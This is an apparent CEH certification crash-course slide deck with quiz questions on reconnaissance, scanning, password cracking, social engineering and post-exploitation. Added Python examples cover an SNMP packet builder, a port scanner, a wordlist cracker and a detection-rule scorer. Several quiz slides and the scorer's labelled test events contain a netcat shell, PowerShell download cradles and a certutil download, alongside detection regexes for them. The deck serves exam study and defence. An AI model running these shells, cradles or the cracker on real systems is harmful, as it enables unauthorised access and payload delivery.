CEH Day 1


Certified Ethical Hacker (CEH)

Certification Crash Course


(Day 1)

Omar Santos
@santosomar
DAY 1

Introduction to Ethical Hacking and to the CEH exam

Foot-printing, Enumeration, Reconnaissance, and Network Scanning

Vulnerability Analysis and System Hacking

Social Engineering

Denial-of-Service

Session Hijacking, Evading IDS, IPS, Firewalls, and Honeypots


DAY 2

Cryptography

Hacking Wireless Networks

Hacking Web Servers and Web Applications

Hacking Mobile Platforms

IoT Hacking

Cloud Computing
Resources:
CEH Review: https://cehreview.com
The Art of Hacking: https://theartofhacking.org
GitHub: https://h4cker.org/github
https://learning.oreilly.com/certifications/9780136758433/
DISCLAIMER | WARNING

The information provided in this training is for educational purposes only. The author, O’Reilly,
and any other entity are in no way responsible for any misuse of the information.

Some of the tools and technologies that you will learn in this training class may be illegal
depending on where you reside. Please check with your local laws.

Please practice and use all the tools that are shown in this training in a lab that is not connected
to the Internet or any other network.
What this class is and is not…

• This is a review class of the CEH exam.


• This training helps you prepare for the test; it does not
guarantee that you will pass.
• We will cover all major topics covered in the CEH exam.
You still need to practice, study, and learn from other
resources.
POLL QUESTION

How long have you been performing security penetration testing (ethical hacking)?
• Just started
• Less than a year
• 1-2 years
• 3 years or more
• I have never done pen testing. I am just curious about this training.
POLL QUESTION

How are you preparing for the CEH exam?


• Books only
• Safari Video Courses
• Only this live training course
• Other courses
• I am not studying for the CEH exam.
Introduction to Ethical Hacking
and to the CEH Exam
EC-Council CEH Exam

• Number of Questions: 125


• Test Duration: 4 Hours
• Test Format: Multiple Choice
• Test Delivery: ECC EXAM, VUE
• Exam Prefix: 312-50 (ECC EXAM), 312-50 (VUE)

https://www.eccouncil.org/programs/certified-ethical-hacker-ceh
EC-Council CEH Exam Collateral

• Exam Brochure:
https://www.eccouncil.org/wp-content/uploads/2016/07/CEHv10-Brochure.pdf

• CEH Candidate Handbook:


https://s3-us-west-2.amazonaws.com/edm-image/documents/CEH-Handbook-v2.2.pdf

• Blueprint: https://cert.eccouncil.org/certified-ethical-hacker.html

• FAQ: https://cert.eccouncil.org/faq.html

https://www.eccouncil.org/programs/certified-ethical-hacker-ceh
CEH (ANSI) vs CEH Practical
Before we get started with Ethical Hacking…
A few concepts that you must be familiar with (in the forms
of review questions)…
What is the CIA Triad?

a) Confidentiality, Integrity, Assurance


b) Confidentiality, Integrity, Availability
c) Compromise, Integrity, Assurance
d) Compromise, Information, Availability
e) None of the above
What is the CIA Triad?

Confidentiality, Integrity, Availability
Which of the following ensures that data is received without
modification?

a) Integrity
b) Availability
c) Authentication
d) Authorization
e) Confidentiality
Which of the following attacks leverages built-in code and
scripts within off-the-shelf applications?

a) Privilege escalation
b) Heap attacks
c) Shrink-wrap
d) Cross-site scripting
Which of the following describes an attacker that is
motivated by political beliefs?

a) Script kiddie
b) Hacktivist
c) Gray hat hacker
d) Black hat hacker
Which of the following best describes when the tester does not
have any prior knowledge of the systems being tested?

a) White box testing
b) Black box testing
c) Gray box testing
Which of the following are laws that are related to Ethical
Hacking?

a) 18 U.S.C § 1029 and 1030


b) The SPY Act
c) Freedom of Information Act (5 U.S.C. § 552) and the Privacy Act of 1974
d) None of the above
e) All of the above
Which of the following are Penetration Testing Methodologies?

a) Penetration Testing Execution Standard


b) OWASP Testing Guide
c) NIST 800-115: Technical Guide to Information Security Testing and Assessment
d) Open Source Security Testing Methodology Manual (OSSTMM)
e) Common Vulnerability Scoring System (CVSS)
f) A and E
g) A, B, and E
h) A, B, C, and D
Become Familiar with Penetration Testing Methodologies

• Penetration Testing Execution Standard:


http://www.pentest-standard.org

• OWASP Testing Guide:


https://www.owasp.org/index.php/OWASP_Testing_Project

• NIST 800-115: Technical Guide to Information Security Testing and Assessment:


http://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-115.pdf

• Open Source Security Testing Methodology Manual (OSSTMM):


http://www.isecom.org/research
PEN TESTING LIFECYCLE

PRE-ENGAGEMENT: Pre-engagement (start interactions and scoping)
DURING ENGAGEMENT: Intelligence Gathering → Threat Modeling → Vulnerability Analysis → Exploitation → Post-Exploitation
AFTER ENGAGEMENT: Report → End

Aligned with: http://www.pentest-standard.org


EC Council System Hacking Methodology

Foot-printing → Scanning → Enumeration → Vulnerability Analysis
Gaining Access (Cracking Passwords, Elevating Privileges, etc.) → Maintaining Access (Executing Applications, Hiding Files, etc.) → Clearing Logs and Covering Tracks
Additional References of Safari Content Related to this Section

Penetration Testing Methodologies:


https://cehreview.com/go/methodologies

Attack types:
https://cehreview.com/go/attack_types
https://cehreview.com/go/attack_types2

Legal aspects of penetration testing:


https://cehreview.com/go/legal
Foot-printing, Enumeration, Reconnaissance,
and Network Scanning
Active vs. Passive Recon (Foot-printing)
Passive Recon

• Search Engines (check out and play with Google Hacking DB


https://www.exploit-db.com/google-hacking-database/)
• Web Services
• Certificate information
• Social networks, Groups, Forums, Blogs, etc.
• Email, PGP public key servers, etc.
• Competitive Intelligence
• WHOIS (what about GDPR impact?)
• DNS
• Shodan (https://shodan.io)
• CEH mixes social engineering in Foot-printing ¯\_(ツ)_/¯
• OSINT <-- what is it?
Tools for Passive Recon

• Maltego
• Recon-NG
• Spider Foot
• The Harvester
• Discover
• OWASP Amass
Additional References for Passive Recon

• Recorded demos and detailed explanations: https://cehreview.com/go/passive_recon
• Passive Recon and OSINT resources: https://github.com/The-Art-of-Hacking/art-of-hacking/tree/master/osint
What is Active Recon?

“Actively” performing a network or vulnerability scan and launching other tools against the victim.

Examples:
Scanners: Nmap, Nessus, Qualys, Nexpose, Retina
Fuzzing (in some cases)


Scanning

• Network Scanning Concepts
• Scanning Tools
• Scanning Techniques
• Banner Grabbing
• Creating Threat Models and Network Diagrams
• Open Source and Vulnerability Scanners
Whiteboard Explanation
Nmap – and other scanners
Using Python Scanning Modules
Hping3
Enumeration of User Accounts and Gathering Other Information

• PsExec – executes processes remotely
• PsFile – shows files opened remotely
• PsGetSid – gets the SID of a computer or user
• PsKill – kills processes
• PsList – detailed process info
• PsInfo – lists information about a system
• PsLoggedOn – shows who’s logged on
• PsLogList – dumps event log records
• PsPasswd – changes account passwords
• PsShutdown – shuts down or reboots a system

https://github.com/The-Art-of-Hacking/art-of-hacking/blob/master/cheat_sheets/PowerShellCheatSheet_v41.pdf
SNMP

• The Simple Network Management Protocol (SNMP) is a protocol used by many individuals and organizations to manage network devices.
• SNMP uses UDP port 161 (traps sent from the agent to the manager use UDP port 162).
• In SNMP implementations, every managed network device runs an SNMP agent that is polled by (and sends traps to) an independent SNMP server (also known as the SNMP manager).
• An administrator can use SNMP to obtain health information and the configuration of a networking device, to change the configuration, and to perform other administrative tasks.
• As you can see, this is very attractive to attackers, because they can leverage SNMP vulnerabilities (or a guessed or sniffed community string) to perform the same actions in a malicious way.
SNMP Enumeration
Which of the following describes one of the differences
between SNMPv2c and SNMPv3?
a) SNMPv2c uses two authenticating credentials: the first is a public key to view the configuration or to obtain health status of the device, and the second is a private key to configure the managed device. SNMPv3 uses three credentials including a certificate.

b) SNMPv3 uses two authenticating credentials: the first is a public key to view the configuration or to obtain health status of the device, and the second is a private key to configure the managed device. SNMPv2c uses three credentials including a certificate.

c) SNMPv2c uses certificates for authentication or a pre-shared key. SNMPv3 authenticates SNMP users using usernames and passwords.

d) SNMPv2c uses two authenticating credentials: the first is a public community string to view the configuration or to obtain health status of the device, and the second is a private community string to configure the managed device. SNMPv3 authenticates SNMP users using usernames and passwords and can protect confidentiality. SNMPv2c does not provide any confidentiality protection.
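To make the v2c-versus-v3 difference concrete, here is an added example (my own code, not from the deck and not an SNMP library): it BER-encodes the exact datagram a manager sends to UDP/161 to read sysDescr.0, then parses that datagram back out to recover the community string, which is all a passive sniffer on the management VLAN has to do. The request-id, community string and OID are assumed values; the optional snmp_get() sends the packet for real and must only be pointed at devices you are authorized to test.

```python
"""SNMPv2c GetRequest encoder and community-string extractor.

Added example, not from the deck and not an SNMP library: it BER-encodes
the datagram a manager sends to UDP/161 to read sysDescr.0, then parses
that datagram back to pull out the community string. The point is right
there in the bytes: in v1/v2c the credential is a cleartext string, so
anyone who can sniff it (or guess it, which is what snmp-brute does)
gets the same read or write access. SNMPv3 wraps the same PDU in a USM
header with a username, an HMAC for authentication and optional
encryption, so the extractor rejects it.
"""
import socket

SYS_DESCR_0 = (1, 3, 6, 1, 2, 1, 1, 1, 0)   # SNMPv2-MIB::sysDescr.0


def _ber_len(n):
    """BER length: short form below 128, long form (0x80|N then N bytes) above."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def _tlv(tag, content):
    return bytes([tag]) + _ber_len(len(content)) + content


def _ber_int(value):
    """INTEGER: minimal two's-complement encoding."""
    length = 1
    while not -(1 << (8 * length - 1)) <= value < (1 << (8 * length - 1)):
        length += 1
    return _tlv(0x02, value.to_bytes(length, "big", signed=True))


def _ber_oid(arcs):
    """OBJECT IDENTIFIER: 40*a+b for the first two arcs, base-128 for the rest."""
    out = bytearray([40 * arcs[0] + arcs[1]])
    for arc in arcs[2:]:
        chunk = [arc & 0x7F]
        arc >>= 7
        while arc:
            chunk.append(0x80 | (arc & 0x7F))
            arc >>= 7
        out.extend(reversed(chunk))
    return _tlv(0x06, bytes(out))


def build_get_request(community, oid=SYS_DESCR_0, request_id=1):
    """Wire bytes of an SNMPv2c GetRequest for a single OID."""
    varbind = _tlv(0x30, _ber_oid(oid) + _tlv(0x05, b""))              # OID + NULL value
    pdu = _tlv(0xA0, _ber_int(request_id) + _ber_int(0) + _ber_int(0)  # GetRequest-PDU:
               + _tlv(0x30, varbind))                                   # id, err-status, err-index, varbinds
    return _tlv(0x30, _ber_int(1) + _tlv(0x04, community.encode()) + pdu)   # version 1 == v2c


def _read_tlv(buf, pos):
    """Decode the TLV starting at buf[pos]; return (tag, content, next_pos)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:
        nbytes = length & 0x7F
        length = int.from_bytes(buf[pos:pos + nbytes], "big")
        pos += nbytes
    return tag, buf[pos:pos + length], pos + length


def extract_community(datagram):
    """Return (version, community) from an SNMPv1/v2c message (0 == v1, 1 == v2c)."""
    tag, body, _ = _read_tlv(datagram, 0)
    if tag != 0x30:
        raise ValueError("not an SNMP message")
    _, vbytes, pos = _read_tlv(body, 0)
    version = int.from_bytes(vbytes, "big", signed=True)
    if version not in (0, 1):                  # 3 == SNMPv3: USM header, no community
        raise ValueError(f"SNMP version {version} carries no community string")
    ctag, community, _ = _read_tlv(body, pos)
    if ctag != 0x04:
        raise ValueError("malformed message: expected OCTET STRING community")
    return version, community.decode("latin-1")


def snmp_get(host, community="public", oid=SYS_DESCR_0, timeout=2.0):
    """Send one GetRequest to host:161/udp and return the raw reply, or None on timeout.
    Only run it against devices you are authorized to test."""
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.settimeout(timeout)
    try:
        s.sendto(build_get_request(community, oid), (host, 161))
        return s.recv(4096)
    except socket.timeout:
        return None
    finally:
        s.close()


if __name__ == "__main__":
    pkt = build_get_request("public")
    print(pkt.hex())                 # 'public' is visible in the clear as 7075626c6963
    print(extract_community(pkt))    # (1, 'public')
```

The encoder is deliberately minimal (one varbind, no SET support); it is enough to see why a "public"/"private" pair on a v2c device is a credential leak and why the Nmap snmp-* scripts on the next slide only need a community string to pull interfaces, processes and Windows users.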
Nmap SNMP Scripts
root@kali:/usr/share/nmap/scripts# ls -1 snmp*
snmp-brute.nse
snmp-hh3c-logins.nse
snmp-info.nse
snmp-interfaces.nse
snmp-ios-config.nse
snmp-netstat.nse
snmp-processes.nse
snmp-sysdescr.nse
snmp-win32-services.nse
snmp-win32-shares.nse
snmp-win32-software.nse
snmp-win32-users.nse
root@kali:/usr/share/nmap/scripts#
Other Enumeration You Should Become Familiar With…

• LDAP Enumeration
• NTP Enumeration
• NETBIOS/SMB Enumeration
enum4linux
IP Scanner (http://10base-t.com)
Fing
Additional Mobile Scanning Tools

• Hackode
• zANTI
• cSploit
• FaceNiff
• PortDroid
• Pamn IP Scanner
Additional References for Active Recon

• Recorded demos and detailed explanations: https://cehreview.com/go/active_recon
• Cheat Sheets: https://cehreview.com/go/cheat
What does the following command do?

# hping3 -S theartofhacking.org -p 80
What does the following command do?

# nmap -sC web.h4cker.org -p 80-6669


What does the following command do?

# nmap -F portal.h4cker.org
Which of the following is not an open source scanner?
(Select all that apply)

a) Retina
b) Nmap
c) Qualys
d) Nexpose
Which of the following tools is primarily used to enumerate
domain information?

a) DNSRecon
b) Nmap
c) Metasploit
d) Nikto
When running an Nmap SYN scan, what will the Nmap result be if
ports on the target device do not respond?

a) Open

b) Closed

c) Filtered

d) Listening
Which of the following Nmap options would you use to
perform a TCP connect scan?

a) -sF
b) -sU
c) -sT
d) -sS
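The two Nmap questions above turn on what a scanner can actually observe per port. As an added example (my own code, not from the deck or from Nmap), here is a small TCP connect() scanner, the same probe `nmap -sT` uses, that maps the three outcomes every scanner has to distinguish (handshake completed, RST/connection refused, no answer before the timeout) and grabs the banner the way the "Banner Grabbing" topic describes. The banner service, the banner text and the use of 127.0.0.1 are constructed so it runs offline; the state labels follow Nmap's open/closed/filtered vocabulary.

```python
"""Minimal TCP connect() scanner with banner grabbing.

Added example (not from the CEH deck and not Nmap code): it reproduces
what `nmap -sT` does for a handful of ports and maps the three outcomes a
scanner has to tell apart: open (handshake completed), closed (RST, i.e.
connection refused) and filtered (no answer before the timeout, which is
what a firewall silently dropping the probe looks like). The banner
server is a constructed stand-in so the script can be exercised offline
against 127.0.0.1.
"""
import socket
import threading


def probe_port(host, port, timeout=1.0, read_banner=True):
    """Return (state, banner) for one TCP port.

    state is "open", "closed" or "filtered"; banner is whatever the service
    volunteered within `timeout` seconds (many services wait for the client
    to speak first, so an empty banner does not mean an empty port).
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    try:
        s.connect((host, port))
    except ConnectionRefusedError:
        return "closed", ""            # RST came back: nothing is listening
    except socket.timeout:
        return "filtered", ""          # SYN was dropped: no SYN/ACK, no RST
    except OSError:
        return "filtered", ""          # e.g. no route to host
    banner = ""
    if read_banner:
        try:
            banner = s.recv(256).decode("latin-1", "replace").strip()
        except (socket.timeout, OSError):
            banner = ""
    s.close()
    return "open", banner


def scan(host, ports, timeout=1.0):
    """Probe each port in order; return {port: (state, banner)}."""
    return {p: probe_port(host, p, timeout) for p in ports}


def start_banner_server(banner, host="127.0.0.1"):
    """Constructed test service: accepts connections and sends `banner`.

    Returns the ephemeral port it listens on. It exists only so the scanner
    can be demonstrated without touching a real network.
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))
    srv.listen(5)
    port = srv.getsockname()[1]

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return
            with conn:
                conn.sendall(banner)

    threading.Thread(target=serve, daemon=True).start()
    return port


def free_port(host="127.0.0.1"):
    """Reserve and release an ephemeral port so nothing is listening on it."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind((host, 0))
    port = s.getsockname()[1]
    s.close()
    return port


if __name__ == "__main__":
    listening = start_banner_server(b"SSH-2.0-OpenSSH_8.4 (constructed banner)\r\n")
    for port, (state, banner) in scan("127.0.0.1", [listening, free_port()]).items():
        print(f"{port}/tcp {state:8} {banner}")
```

A connect() scan completes the handshake, so it shows up in the target's application logs; a SYN scan (`-sS`) stops after the SYN/ACK and needs raw sockets, but its open/closed/filtered classification is the same one this script derives from the connect() result.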
Which method of information gathering uses publicly
available information sources to collect and analyze
information about a target?

a) Open Source Intelligence

b) Vulnerability Scanning

c) Port Scanning

d) Packet Crafting
Which type of vulnerability scan would require the scanner
to log in to the target system and run privileged
commands to gather results?

a) Discovery scan

b) Unauthenticated scan

c) Authenticated scan

d) Web scan
Vulnerability Analysis and System Hacking
Things that you should know…

• Vulnerability Research and Classification
• Vulnerability Assessment and Tools
• Vulnerability Management Lifecycle
• Approaches of Vulnerability Assessment Solutions
• Vulnerability Scoring Systems
Tell me more…

• Public Exploits and Known Vulnerabilities


• Scanners
• Default Passwords
Exploit DB and Searchsploit Demo
OWASP TOP 10

https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
Whiteboard
Explanation
Passwords
DEMO – CRACKING PASSWORDS
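The deck runs password cracking as a live demo with a real cracker. As an added example (my own code, not from the deck and not a cracking tool), here is the same attack reduced to its essentials: a small wordlist plus a few mangling rules is run against unsalted MD5 hashes of the kind still found in old web-application databases, and against a salted PBKDF2-HMAC-SHA256 hash. Both fall when the password is in the list; the difference is the cost per guess and the fact that a salt stops one guess from covering every user. The wordlist, the "dumped" hashes and the salt are constructed for the example.

```python
"""Wordlist attack against unsalted hashes vs. salted, iterated ones.

Added example (not from the deck, which shows this as a live demo with a
real cracker): a small wordlist plus two mangling rules is run against
MD5 hashes of the kind still found in old web-app databases and against
a PBKDF2-HMAC-SHA256 hash. Both fall when the password is in the list;
the difference is cost per guess, which is what salting and key
stretching buy the defender. Wordlist, hashes and salt are constructed.
"""
import hashlib
import time

WORDLIST = ["password", "letmein", "summer", "welcome", "qwerty", "dragon"]


def candidates(wordlist):
    """Yield each word plus a few common mangling rules (a tiny rules file)."""
    for w in wordlist:
        yield w
        yield w.capitalize()
        for suffix in ("1", "123", "!", "2020"):
            yield w + suffix
            yield w.capitalize() + suffix


def crack_md5(target_hex, wordlist):
    """Unsalted MD5: one cheap hash per guess, and identical passwords give
    identical hashes, so one pass over the wordlist cracks every user."""
    for guess in candidates(wordlist):
        if hashlib.md5(guess.encode()).hexdigest() == target_hex:
            return guess
    return None


def pbkdf2(password, salt, iterations=100_000):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)


def crack_pbkdf2(target, salt, iterations, wordlist):
    """Salted and stretched: every guess costs `iterations` HMACs, and the
    work cannot be shared across users that have different salts."""
    for guess in candidates(wordlist):
        if pbkdf2(guess, salt, iterations) == target:
            return guess
    return None


def crack_all(dump, wordlist):
    """Crack a {user: md5_hex} dump; None means the wordlist did not contain it."""
    return {user: crack_md5(h, wordlist) for user, h in dump.items()}


# Constructed "dumped" credentials; the plaintexts are Summer2020, letmein!
# and Tr0ub4dor&3 (the last one is not reachable from the wordlist).
MD5_DUMP = {"alice": hashlib.md5(b"Summer2020").hexdigest(),
            "bob": hashlib.md5(b"letmein!").hexdigest(),
            "carol": hashlib.md5(b"Tr0ub4dor&3").hexdigest()}
SALT = b"\x8a\x13\x7f\x02\x5e\xc0\x91\x44"          # constructed per-user salt
PBKDF2_DUMP = {"alice": pbkdf2("Summer2020", SALT)}


if __name__ == "__main__":
    t = time.perf_counter()
    print("md5   ", crack_all(MD5_DUMP, WORDLIST), f"{time.perf_counter() - t:.3f}s")
    t = time.perf_counter()
    print("pbkdf2", crack_pbkdf2(PBKDF2_DUMP["alice"], SALT, 100_000, WORDLIST),
          f"{time.perf_counter() - t:.3f}s")
```

The timing printed by the `__main__` block is the whole lesson: the MD5 dump is cracked in microseconds, while the same thirty-odd guesses against PBKDF2 take on the order of a second, and a real cracker has to pay that for every user separately.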
Common Vulnerability Scoring System

first.org/cvss
Product vs. Services Based Vulnerability Assessment
OpenVAS

http://www.openvas.org/
Remember the EC Council’s Definition of System Hacking
¯\_(ツ)_/¯

“The process of gaining access, escalating privileges, maintaining control, and covering tracks.”
What TCP port may indicate a Windows system? (tricky question)

a) 41
b) 8080
c) 445
d) 25
What is a Tree Based Assessment Approach?

a) The pen tester uses different strategies for each system and component (i.e.,
different scanners, tools)

b) The pen tester uses the same strategies for each system

c) The pen tester develops a tree-like vulnerability report

d) The pen tester develops a tree-based threat model


Social Engineering
A few questions before getting started with Social Engineering…
Which of the following is when the attacker presents a link
or an attachment that looks like a valid, trusted resource to
a user?
a) Email exploitation
b) Phishing
c) Elicitation
d) Pretexting
Which of the following is not true about Pharming?

a) Pharming can be done by altering the hosts file on a victim’s system

b) Threat actors performing a pharming attack can leverage DNS poisoning and exploit DNS-based vulnerabilities.

c) In a pharming attack a threat actor redirects a victim from a valid website or resource to a malicious one that could be made to appear as the valid site to the user.

d) Pharming can be done by exploiting a buffer overflow using the Windows PowerShell
Which of the following refers to the act of incorporating malicious
ads on trusted websites, which results in users' browsers being
inadvertently redirected to sites hosting malware?

a) Malvertising
b) Pharming
c) Active Ad Exploitation
d) Whaling
Which of the following is true about Spear Phishing?

a) Spear phishing attacks use the Windows Administrative Center.

b) Spear phishing attacks are phishing attempts that are constructed in a very specific way
and directly targeted at specific individuals or companies.

c) Spear phishing, Whaling, and Phishing are the same type of attack.

d) Spear phishing attacks use the Windows PowerShell


Which of the following is not true about Whaling?

a) Whaling is similar to phishing and spear phishing; however, the attack is targeted at high-profile business executives and key individuals within a corporation.

b) Whaling is similar to phishing and spear phishing; however, the attack is targeted at critical systems and cloud services.

c) Whaling is not similar to phishing and spear phishing.

d) Whaling is similar to command injection attacks; however, the attack is targeted at critical systems and cloud services.
Which of the following is true about interrogation?

a) The interrogation should not take longer than 5 minutes.

b) The victim pays close attention to your gestures, but you should not pay
attention to their posture or body language.

c) If you are conducting an interrogation, you should pay attention to the
victim’s posture, body language, skin color, and eye movement.

d) It is illegal to pay attention to the victim’s posture, body language, skin
color, and eye movement during an interrogation.
So what is social engineering?

• Social engineering attacks leverage the weakest link, which is the human user.
• If the attacker can get the user to reveal information, it is much easier for the
attacker to cause harm rather than using some other method of reconnaissance.
• This could be done through email or misdirection of web pages, which results in
the user clicking something that leads to the attacker gaining information. Social
engineering can also be done in person by an insider or outside entity or over the
phone.
Denial-of-Service
Denial-of-service (DoS) and distributed DoS (DDoS)

• DDoS attacks can generally be divided into the following three categories:
• Direct DDoS attacks
• Reflected DDoS attacks
• Amplification DDoS attacks

Direct DDoS attacks: Botnets

Reflected DoS

Amplification Attacks: An amplification attack is a form of reflected attack in which the response traffic (sent by the unwitting participant) is made up of packets that are much larger than those that were initially sent by the attacker (spoofing the victim).
Session Hijacking, Evading IDS, IPS, Firewalls,
and Honeypots (and more – I want you to
learn beyond CEH)…

• Evasion Techniques: Encryption & Obfuscation
• Demo Using the EternalBlue Exploit
• Pivoting: Whiteboard Explanation
• Exfil: egressbuster & just a simple letmeout script…
Which of the following are post exploitation activities to
maintain persistence in a compromised system?

a) Creating and manipulating scheduled jobs and tasks


b) Creating custom daemons and processes
c) Creating new users
d) All of the above
Which of the following describes what the
nc -lvp 2233 -e /bin/bash command does?

a) The netcat utility is used to create a bind shell on the victim system and to execute
the bash shell.

b) The netcat utility is used to create a reverse shell on the victim system and to
execute the bash shell.

c) The netcat utility is used to create a reverse shell on the victim system and to
exclude the bash shell from being executed.

d) The netcat utility is used to create a reverse shell on the attacking system and to
exclude the bash shell from being executed.
Which of the following commands creates a listener on a
system on port 8899?

a) nc -nv 8899

b) nl -cp 8899

c) nc host 10.1.1.1 port 8899

d) nc -lvp 8899
Which of the following is NOT a legitimate Windows tool that
can be used for post-exploitation tasks?

a) PowerShell

b) PowerSploit

c) PSExec

d) WMI
(New-Object System.Net.WebClient).DownloadFile("http://192.168.78.147/nc.exe","nc.exe")

What is the code above doing?


Which of the following is typically not used as a post-
exploitation tool?

a) SET

b) Mimikatz

c) PowerSploit

d) Empire
What are false positives, false negatives, true positives,
true negatives?
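The four terms are easiest to see on a real rule. As an added example (my own code, not from the deck), a small two-signature detector for the living-off-the-land commands shown on the previous slides (a netcat shell started with -e, and a PowerShell WebClient download cradle) is run over constructed process-creation log lines, each labelled with ground truth, and the TP/FP/FN/TN counts plus precision and recall are computed from the outcome. The log lines, their labels and the two regexes are invented for the example; the certutil line is included on purpose because the rule set has no signature for it.

```python
"""Scoring a detection rule: TP / FP / FN / TN on labelled events.

Added example, not from the deck: a signature set that flags the two
living-off-the-land patterns from the previous slides (a netcat
bind/reverse shell using -e and a PowerShell WebClient download cradle)
is run over constructed process-creation log lines, each labelled with
ground truth, and the four outcome counts plus precision/recall are
computed. Log lines, labels and regexes are invented for the example.
"""
import re

# name -> compiled regex applied to the process command line
SIGNATURES = {
    "netcat_exec_shell": re.compile(r"\bnc(?:at)?\b.*\s-[a-zA-Z]*e\s", re.I),
    "powershell_download_cradle": re.compile(
        r"powershell.*(?:Net\.WebClient|DownloadFile|DownloadString|Invoke-WebRequest|iwr\b)",
        re.I),
}

# Constructed process-creation events: (command line, truly malicious?)
EVENTS = [
    ("nc -lvp 2233 -e /bin/bash", True),                              # bind shell
    ("nc 10.0.0.5 4444 -e cmd.exe", True),                            # reverse shell
    ('powershell -nop -w hidden -c "(New-Object System.Net.WebClient)'
     '.DownloadFile(\'http://192.168.78.147/nc.exe\',\'nc.exe\')"', True),
    ("powershell -c \"IEX (New-Object Net.WebClient).DownloadString('http://10.1.1.9/a.ps1')\"", True),
    ("certutil -urlcache -split -f http://10.1.1.9/x.exe x.exe", True),   # no signature: missed
    ("nc -zv db01 5432", False),                                      # port check, no -e
    ("powershell -c Get-Process", False),
    ("powershell -c \"Invoke-WebRequest https://internal/report.csv -OutFile r.csv\"", False),  # admin
    ("ncat --version", False),
    ("grep -e pattern file.txt", False),                              # 'nc' must be a whole word
]


def detect(cmdline):
    """Return the names of all signatures that match one command line."""
    return [name for name, rx in SIGNATURES.items() if rx.search(cmdline)]


def confusion(events):
    """Count TP/FP/FN/TN for the rule set over labelled events."""
    counts = {"tp": 0, "fp": 0, "fn": 0, "tn": 0}
    for cmd, malicious in events:
        alerted = bool(detect(cmd))
        if alerted and malicious:
            counts["tp"] += 1      # true positive: alert on a real attack
        elif alerted:
            counts["fp"] += 1      # false positive: alert on benign activity
        elif malicious:
            counts["fn"] += 1      # false negative: attack slipped through
        else:
            counts["tn"] += 1      # true negative: benign and silent
    return counts


def precision_recall(counts):
    """Precision = TP/(TP+FP) (alert quality); recall = TP/(TP+FN) (coverage)."""
    tp, fp, fn = counts["tp"], counts["fp"], counts["fn"]
    precision = tp / (tp + fp) if tp + fp else 0.0
    recall = tp / (tp + fn) if tp + fn else 0.0
    return precision, recall


if __name__ == "__main__":
    for cmd, label in EVENTS:
        print(f"{'MAL' if label else 'ok ':3} {detect(cmd) or '-'}  {cmd[:60]}")
    c = confusion(EVENTS)
    print(c, "precision/recall = %.2f / %.2f" % precision_recall(c))
```

On this data the rule set scores 4 TP, 1 FP (an administrator's Invoke-WebRequest), 1 FN (the certutil download it has no signature for) and 4 TN. Tightening the cradle regex to drop the FP would cost recall on attackers who use Invoke-WebRequest; adding a certutil signature raises recall without touching precision. That trade-off is what the four terms are for.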
File-less Malware

• File-less malware does not leverage traditional executable files.
• Living off the land is when attackers use legitimate tools that are already on the system for malicious purposes; the technique has been around for at least twenty-five years.
• PowerShell, Windows Management Instrumentation (WMI), Python, Bash, .NET, malicious macros, etc.
• Used for lateral movement, privilege escalation, recon, enumeration, and evasion.
Thank you!
See you tomorrow…
Don’t forget to check out your other resources:

• Ethical Hacking Video on Demand: https://theartofhacking.org


• Other Cybersecurity Live Training: https://theartofhacking.org/training
• Additional Resources: https://theartofhacking.org/resources
